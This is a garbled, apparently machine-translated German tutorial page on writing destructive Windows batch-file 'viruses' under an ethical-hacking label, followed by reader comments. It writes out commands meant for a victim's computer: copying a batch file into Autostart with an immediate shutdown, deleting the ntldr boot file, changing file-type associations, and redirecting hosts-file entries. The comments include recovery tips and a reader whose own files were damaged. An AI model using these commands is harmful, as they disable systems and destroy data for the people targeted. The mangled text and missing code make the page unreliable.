Batch-Dateien - die Kunst der Herstellung von Viren, Ethical Hacking Tutorials, wie man hackt
Kopieren anything.bat „C: \ Dokumente und Einstellungen \ Administrator \ Startmenü \ Programme \ Autostart“
Kopieren anything.bat „C: \ Dokumente und Einstellungen \ All Users \ Startmenü \ Programme \ Autostart“ // diese beiden Befehle, um die Batch-Datei in Windows Start-Ordner (in XP) kopiert
Shutdown -s -t 00 // Dies wird Herunterfahren des Computers in 0 Sekunden
Hinweis. Dateien in Start-up-Ordner wird automatisch gestartet, wenn Windows gestartet wird. Sie sollten zunächst zwei Codezeilen in jedem Code-Virus, so dass es sich im Autostart-Ordner kopieren. Starten Sie den Ordnerpfad in Windows 7 C: \ Benutzer \ sys \ AppData \ Roaming \ Microsoft \ Windows \ Startmenü \ Programme \ Autostart
Jedesmal, würde das Opfer die Computer starten, die Batch-Datei in Windows Start würde den Computer sofort ausgeführt und Herunterfahren. Sie können diesen Virus entfernen, indem Sie den Computer im abgesicherten Modus starten und die Batch-Datei von Start Up-Ordner zu löschen.
4. Löschen von Boot-Dateien
Goto Laufwerk C in Win XP. Extras-> Ordner Optionen-> Ansicht
Deaktivieren Sie nun die Option ‚Verstecken Betriebssystemdateien‘ und überprüfen Option ‚Alle Dateien und Ordner‘. klicken Sie gelten
Jetzt können Sie die Betriebssystemdateien sehen. Es gibt eine eine Datei ‚ntldr‘, die Bootloader verwendet, um die Fenster zu starten.
Ermöglicht eine Batch-Datei zu
diese Datei aus Opfer Computern löschen und die Fenster nicht gestartet werden dann.
attrib -S -R -H C: \ ntldr // -S, -R, -H Systemdateiattribut zu löschen, lesen Sie nur Attribut. verstecktes Dateiattribut bzw.
del ntldr // ntldr Datei löschen
Nachdem diese Batchdatei ausgeführt wird. System wird nicht neu gestartet, und ein normales Opfer wieder die Fenster definitiv installieren würde.
Jede Erweiterung ist mit einer Datei des Typs wie Endung ‚exe‘ zugeordnet ist, wird mit Datei des Typs ‚exefile‘ verbunden. Um sich zu sehen, nur Befehl ‚Assoc‘ in Eingabeaufforderung eingeben.
Oberhalb Code die Zuordnung einiger Erweiterungen ändert ‚etwas‘ zu filetype (bedeutet u etwas schreiben kann), die offensichtlich nicht existiert. Also alles exe (Farbe, Spiele, Eingabeaufforderung, und viele mehr), JPEG, PNG, MPEG-Dateien wudn't richtig öffnen.
7. DNS Poisoning
echo xxx.xxx.xxx.xxx www.anything.com> C: \ windows \ system32 \ drivers \ etc \ hosts // Dieser Befehl druckt oder xxx.xxx.xxx.xxx hinzuzufügen. www.anything.com in hosts-Datei.
Viren wir nur codiert
Wenn u ur ntldr löschen. dann zuerst diese Datei von einem anderen winows System kopieren. halten diese dann in usb. In ur System-Boot jede (ich ziehe ubuntu) Linux, das Live-cd.Dont installieren. booten nur von Live-CD. Wenn u sehen ubuntu Desktop. U kann ur Partitionen von Windows theire finden. dann ur coorect Ordner in c-Laufwerk finden. einfügen ntdlr und starten sysyem. Entfernen Sie Linux-CD. Sie können ur alte Fenster sehen.
Hallo, ich schrieb und lief die Extension Changer-Virus (Doppel versehentlich angeklickt) und wie Sie davon ausgehen können, sind alle mir Dateien wurden verschraubt. Ich schaffte es im abgesicherten Modus zu starten und alles ändern, außer für die ausführbaren Dateien. Ich habe das von Assoc in sicheren Modi cmd eingeben und dann fand ich alle betroffenen Dateierweiterungen und schrieb die korrekten unten. Dann änderte ich sich mit dem folgenden: Assoc .filetype = .file_extension. Dieser arbeitete für alles außer meinen ausführbaren Dateien. Bitte helfen Sie mir, und sorry für so viel zu schreiben. Ich will nur sicher sein, dass ich genug Informationen gab.